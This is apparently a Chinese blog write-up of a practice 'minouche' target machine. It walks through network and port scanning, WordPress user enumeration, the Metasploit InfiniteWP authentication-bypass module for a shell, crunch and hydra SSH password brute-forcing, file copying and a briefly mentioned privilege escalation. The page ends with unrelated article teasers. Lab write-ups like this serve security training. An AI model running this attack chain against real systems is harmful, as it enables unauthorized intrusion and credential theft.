minouche
靶机准备
先将靶机导入虚拟机,并将网络模式改为NAT

扫描不到ip,改VirtualBox,使用桥接,并将kali也改为桥接模式

扫描ip:192.168.0.102
netdiscover -r 192.168.0.0/24192.168.0.0/24

kali:192.168.0.105
渗透测试
扫描端口
nmap -sS -sV -T5 -A -p- 192.168.0.102

开放了3个端口
查看80端口

发现是wordpress的CMS框架
再用dirb扫描,确认一下

用wpscan扫描,枚举用户
wpscan --url http://192.168.0.102 -e u,p
扫描到一个用户:kitty

尝试爆破密码
wpscan --url http://192.168.0.102 -U kitty -P /usr/share/wordlists/rockyou.txt

半天爆不出来,尝试从插件入手,用此工具扫描其插件
wpscan --url http://192.168.0.102 -e u,p --plugins-detection mixed
扫描到插件iwp-client

发现有漏洞:

使用msf搜索此漏洞进行利用
search InfiniteWP
use exploit/unix/webapp/wp_infinitewp_auth_bypass
set lhost 192.168.0.105
set rhosts 192.168.0.102
set username kitty
exploit

成功拿到shell

挖掘信息
一直退到根目录下发现有一个kitty.txt文件,cat查看

有个提示,你的密码使用美元符+猫的名字+你出生的年份不是一个好密码
用kali下自带的crunch根据提示生成字典
命令:
crunch 13 13 -t "$"Minouche19%% -o 1.txt
crunch 13 13 -t "$"Minouche20%% -o 2.txt

用hydra爆破一波
hydra -l kitty -P 2.txt ssh://192.168.0.102
爆破出密码

利用得到的密码,登录

在目录下发现user.txt,cat查看

发现还有一个压缩包:android.zip
拷贝下来解压
scp kitty@192.168.0.102:~/android.zip /root

解压完以后多了一个data里面有很多数据

搜索数据库发现一个数据库里面有东西
find . -name *.db

打开数据库工具在里面发现有一长串数据

尝试用这串数据提权

提权成功
获取root目录下的数据

minouche的更多相关文章
随机推荐
- 用python的turtle作图(一)静态图
最近,花了点时间,用python画图. 主要包括三部分,简单的静态图形,复杂的组合图形,图形动画. (一)画静态图形 长方形, 圆, 三角形, 平行四边形, 五角星 (二)图形的组合 笑脸, 国旗, ...
- Solution -「六省联考 2017」「洛谷 P3750」分手是祝愿
\(\mathcal{Description}\) Link. 有 \(n\) 盏编号为 \(1\sim n\),已知初始状态的灯,每次操作选取 \(x\in[1,n]\),使得所有编号为 \ ...
- 主机磁盘使用率超过85%导致es索引变为只读模式
[ type=cluster_block_exception, reason=index [ index_name ] FORBIDDEN/12/index read-only / allow del ...
- [源码解析] NVIDIA HugeCTR,GPU版本参数服务器--- (4)
[源码解析] NVIDIA HugeCTR,GPU版本参数服务器--- (4) 目录 [源码解析] NVIDIA HugeCTR,GPU版本参数服务器--- (4) 0x00 摘要 0x01 总体流程 ...
- log4j的替换方案
去年12月份,随着log4j暴露出高危漏洞,对于 Java 开发人员来说不是一个好消息,对于 Ops 来说更是如此.前者必须使用固定的 Log4J 版本重新打包他们的应用程序,而后者必须重新部署.但对 ...
- 记录一次dns劫持及其解决办法
发现问题 偶然发现家里的私人云盘不能用了,最开始以为是云盘出现了问题,各种修复重启后发现云盘并没有问题.然后又发现电脑无法使用浏览器访问网页(或者加载异常缓慢),但是各种软件又可以正常使用,win+R ...
- 【性能测试实战:jmeter+k8s+微服务+skywalking+efk】系列之:性能监控、分析、调优等
说明: 本文是基于虚拟机演示的,资源有限 skywalking中拓扑图 kubectl get po -A -owide 测试执行:单场景 查询礼品 jmeter -n -t gift.jmx -l ...
- web渗透绕过
////目录: 403 IP地址绕过与文件名绕过 登录框绕过 SQL注入绕过 文件上传绕过 RCE绕过 403 IP地址绕过与文件名绕过 X-Forwarded-For:127.0.0.1 X-For ...
- Smartbi报表工具的学习笔记,如何学好报表分析?
近期,因为工作需要,学习了一个报表工具Smartbi,这是国产BI软件,其功能还是挺强大的,并且学习成本很低,容易上手. 其实在学习Smartbi之前,我还学习了一段时间的微软BI工具sqlserve ...
- go面试集锦1
目录 1.go优缺点 2.go中常量是怎么实现 3.go的值传递和引用 4.go struct能不能比较 5.go协程线程安全吗 6.go中关键字 7.make和new区别 8.defer 9.生产者 ...